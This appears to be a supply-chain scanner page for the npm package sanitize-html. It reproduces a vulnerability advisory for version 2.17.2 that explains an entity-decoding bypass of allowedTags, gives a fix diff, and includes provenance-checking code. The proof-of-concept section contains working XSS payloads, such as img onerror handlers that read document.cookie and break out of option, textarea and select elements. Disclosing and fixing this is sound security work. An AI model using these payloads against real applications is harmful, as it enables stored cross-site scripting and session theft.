sanitize-html
Clean up user-submitted HTML, preserving allowlisted elements and allowlisted attributes on a per-element basis
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
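The "no provenance" status shows up concretely in a version's registry metadata. The sketch below is a minimal illustration under stated assumptions. It assumes the public npm registry at `https://registry.npmjs.org` returns a per-version manifest, and that this manifest carries a `dist.attestations.provenance` field only when the version was published with provenance. Treat that field path as an assumption. The helper names `provenanceStatus` and `fetchProvenanceStatus` are hypothetical. The sketch only checks whether an attestation is advertised and does not verify any signature. npm's built-in `npm audit signatures` command is the supported way to verify registry signatures and provenance attestations.

```javascript
// Hypothetical sketch: check whether the npm registry advertises a
// provenance attestation for one version of an (unscoped) package.
// ASSUMPTION: the version manifest exposes dist.attestations.provenance
// only when the version was published with provenance.
// This reads metadata only; it does NOT verify any signature.

const REGISTRY = 'https://registry.npmjs.org';

// Pure helper: inspect a version manifest that has already been fetched.
function provenanceStatus(manifest) {
  const provenance = manifest?.dist?.attestations?.provenance;
  return {
    hasProvenance: Boolean(provenance),
    predicateType: provenance?.predicateType ?? null,
  };
}

// Network helper (uses the global fetch available in Node 18+).
// Nothing in this block calls it at load time.
async function fetchProvenanceStatus(name, version) {
  const res = await fetch(`${REGISTRY}/${name}/${version}`);
  if (!res.ok) {
    throw new Error(`registry returned HTTP ${res.status} for ${name}@${version}`);
  }
  return provenanceStatus(await res.json());
}

// Illustrative manifest shapes (hypothetical, not real registry responses).
const attested = {
  dist: { attestations: { provenance: { predicateType: 'https://slsa.dev/provenance/v1' } } },
};
const unattested = { dist: {} };

console.log(provenanceStatus(attested).hasProvenance);   // true
console.log(provenanceStatus(unattested).hasProvenance); // false

// Against the live registry (requires network access):
// fetchProvenanceStatus('sanitize-html', '2.17.2').then(console.log);
```

Keeping the inspection logic in a pure function lets it be tested offline. The network call stays a thin wrapper around it.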
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| dependencies | unvetted-dep:htmlparser2 | AI (dependencies): htmlparser2 is a legitimate dependency used by the real sanitize-html; not itself a risk signal. | ai | |
| dependencies | unvetted-dep:parse-srcset | AI (dependencies): parse-srcset is a legitimate dependency used by the real sanitize-html; not itself a risk signal. | ai | |
v2.17.2
2 findings

CVSS 6.1 (MEDIUM): CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

## Summary

Commit 49d0bb7 introduced a regression in sanitize-html that bypasses `allowedTags` enforcement for text inside `nonTextTagsArray` elements (`textarea` and `option`). Entity-encoded HTML inside these elements passes through the sanitizer as decoded, unescaped HTML, allowing injection of arbitrary tags, including XSS payloads. This affects any application using sanitize-html that includes `option` or `textarea` in its `allowedTags` configuration.

## Details

The vulnerable code is at `packages/sanitize-html/index.js:569-573`:

```javascript
} else if ((options.disallowedTagsMode === 'discard' || options.disallowedTagsMode === 'completelyDiscard') && (nonTextTagsArray.indexOf(tag) !== -1)) {
  // htmlparser2 does not decode entities inside raw text elements like
  // textarea and option. The text is already properly encoded, so pass
  // it through without additional escaping to avoid double-encoding.
  result += text;
}
```

The comment is factually incorrect. htmlparser2 10.x **does** decode HTML entities inside both `<textarea>` and `<option>` elements before passing text to the `ontext` callback. This can be verified:

```javascript
const htmlparser2 = require('htmlparser2');

const parser = new htmlparser2.Parser({
  ontext(text) {
    console.log(JSON.stringify(text));
  }
});
parser.write('<option>&lt;script&gt;</option>');
parser.end();
// Outputs: "<", "script", ">" (entities are decoded)
```

Because the code assumes the text is "already properly encoded" and skips `escapeHtml()`, the decoded entities (`<`, `>`) are written directly to the output as literal HTML characters. This completely bypasses the `allowedTags` filter: any tag can be injected inside an allowed `option` or `textarea` element using entity encoding.

The execution flow:

1. Attacker submits: `<option>&lt;img src=x onerror=alert(1)&gt;</option>`
2. htmlparser2 parses and decodes entities → `ontext` receives `<img src=x onerror=alert(1)>`
3. Code at line 569 checks: tag is `option`, which is in `nonTextTagsArray` → true
4. Line 573: `result += text` writes the decoded text directly, without escaping
5. Output: `<option><img src=x onerror=alert(1)></option>`; the `<img>` tag is injected despite not being in `allowedTags`

The `script` and `style` tags are handled separately at lines 563-568 (before the vulnerable block), so the vulnerability effectively applies to `textarea` and `option`, plus any custom elements the user adds to `nonTextTags`. Prior to commit 49d0bb7, text in these elements fell through to the `escapeHtml` branch (lines 574-580), which correctly re-encoded the decoded entities.

## PoC

**Prerequisites:** An application using sanitize-html 2.17.2 with `option` or `textarea` in `allowedTags`.

**Step 1: Basic tag injection via option**

```javascript
const sanitize = require('sanitize-html');

const output = sanitize(
  '<option>&lt;script&gt;alert(1)&lt;/script&gt;</option>',
  { allowedTags: ['option'] }
);
console.log(output);
// Expected (safe):     <option>&lt;script&gt;alert(1)&lt;/script&gt;</option>
// Actual (vulnerable): <option><script>alert(1)</script></option>
```

**Step 2: Element breakout with XSS event handler**

```javascript
const output2 = sanitize(
  '<option>&lt;/option&gt;&lt;img src=x onerror=alert(document.cookie)&gt;</option>',
  { allowedTags: ['option'] }
);
console.log(output2);
// Output: <option></option><img src=x onerror=alert(document.cookie)></option>
// The <img> tag escapes the option context and executes the onerror handler
```

**Step 3: Textarea breakout (also vulnerable)**

```javascript
const output3 = sanitize(
  '<textarea>&lt;/textarea&gt;&lt;img src=x onerror=alert(1)&gt;</textarea>',
  { allowedTags: ['textarea'] }
);
console.log(output3);
// Output: <textarea></textarea><img src=x onerror=alert(1)></textarea>
```

**Step 4: Full select/option context breakout**

```javascript
const output4 = sanitize(
  '<select><option>&lt;/option&gt;&lt;/select&gt;&lt;img src=x onerror=alert(1)&gt;</option></select>',
  { allowedTags: ['select', 'option'] }
);
console.log(output4);
// Output: <select><option></option></select><img src=x onerror=alert(1)></option></select>
// Breaks out of both the option and select elements
```

All outputs verified against sanitize-html 2.17.2 with htmlparser2 10.x.

## Impact

- **Complete `allowedTags` bypass:** Any HTML tag can be injected through an allowed `option` or `textarea` element using entity encoding, defeating the core security guarantee of sanitize-html.
- **Stored XSS:** Applications that sanitize user-submitted HTML and allow `option` or `textarea` tags (common in form builders, CMS platforms, and rich text editors) are vulnerable to stored cross-site scripting.
- **Session hijacking:** Attackers can inject event handlers (`onerror`, `onload`, etc.) to steal session cookies that are not marked `HttpOnly`, or authentication tokens readable from script.
- **Scope:** Only non-default configurations are affected, because the default `allowedTags` does not include `option` or `textarea`. However, these tags are commonly allowed in applications that handle form-related HTML content.

## Recommended Fix

Remove the vulnerable code block at lines 569-573 entirely. The `escapeHtml` branch (line 574) correctly handles these elements. htmlparser2 10.x decodes entities, and re-encoding with `escapeHtml` produces correct HTML output (entities are round-tripped, not double-encoded).

```diff
--- a/packages/sanitize-html/index.js
+++ b/packages/sanitize-html/index.js
@@ -566,11 +566,6 @@ function sanitizeHtml(html, options, _recursing) {
         // your concern, don't allow them. The same is essentially true for style tags
         // which have their own collection of XSS vectors.
         result += text;
-      } else if ((options.disallowedTagsMode === 'discard' || options.disallowedTagsMode === 'completelyDiscard') && (nonTextTagsArray.indexOf(tag) !== -1)) {
-        // htmlparser2 does not decode entities inside raw text elements like
-        // textarea and option. The text is already properly encoded, so pass
-        // it through without additional escaping to avoid double-encoding.
-        result += text;
       } else if (!addedText) {
         const escaped = escapeHtml(text, false);
         if (options.textFilter) {
```

This fix restores the pre-49d0bb7 behavior, in which all text content outside `script` and `style` goes through `escapeHtml()`. That ensures decoded entities are properly re-encoded before output.
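The difference between the vulnerable and fixed paths can be modelled without sanitize-html or htmlparser2. The sketch below is hypothetical throughout. `escapeText` is an assumed stand-in, loosely modelled on what `escapeHtml(text, false)` does to `&`, `<` and `>`. `emitText` collapses the vulnerable and patched `ontext` branches into a single flag. `findDisallowedTags` is a regex heuristic meant for regression tests, not a parser. The sketch replays PoC Step 3 using the decoded text that, per the advisory, htmlparser2 hands to `ontext`.

```javascript
// Hypothetical model of the two text-handling paths; it does NOT use
// sanitize-html or htmlparser2. escapeText is an assumed stand-in for
// sanitize-html's escapeHtml(text, false).
function escapeText(text) {
  // Escape '&' first so the entities added below are not re-escaped.
  return text
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// decodedText is what the parser passes to ontext after decoding entities.
function emitText(decodedText, { patched }) {
  // Vulnerable path (2.17.2): trusts the text as "already properly encoded".
  if (!patched) return decodedText;
  // Patched path: every non-script/style text node is re-escaped.
  return escapeText(decodedText);
}

// Regression-test heuristic: tag names in html that are not in allowedTags.
// A regex scan is an assumption suitable for tests only, not for sanitizing.
function findDisallowedTags(html, allowedTags) {
  const found = new Set();
  for (const match of html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9-]*)/g)) {
    const name = match[1].toLowerCase();
    if (!allowedTags.includes(name)) found.add(name);
  }
  return [...found];
}

// PoC Step 3: decoded text inside an allowed <textarea>.
const decoded = '</textarea><img src=x onerror=alert(1)>';
const vulnerable = `<textarea>${emitText(decoded, { patched: false })}</textarea>`;
const fixed = `<textarea>${emitText(decoded, { patched: true })}</textarea>`;

console.log(vulnerable); // <textarea></textarea><img src=x onerror=alert(1)></textarea>
console.log(fixed);      // <textarea>&lt;/textarea&gt;&lt;img src=x onerror=alert(1)&gt;</textarea>
console.log(findDisallowedTags(vulnerable, ['textarea'])); // [ 'img' ]
console.log(findDisallowedTags(fixed, ['textarea']));      // []
```

The patched path is safe because the text reaching `ontext` is already decoded. Escaping it once on output restores the entities without double-encoding them. A check like `findDisallowedTags` could be run over the PoC outputs in an application's own test suite to catch a reappearance of the bypass.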
Package was published without Sigstore provenance. Consider asking the maintainer to enable provenance in their CI/CD publishing workflow.
v2.17.1
1 finding
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v2.17.0
1 finding
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.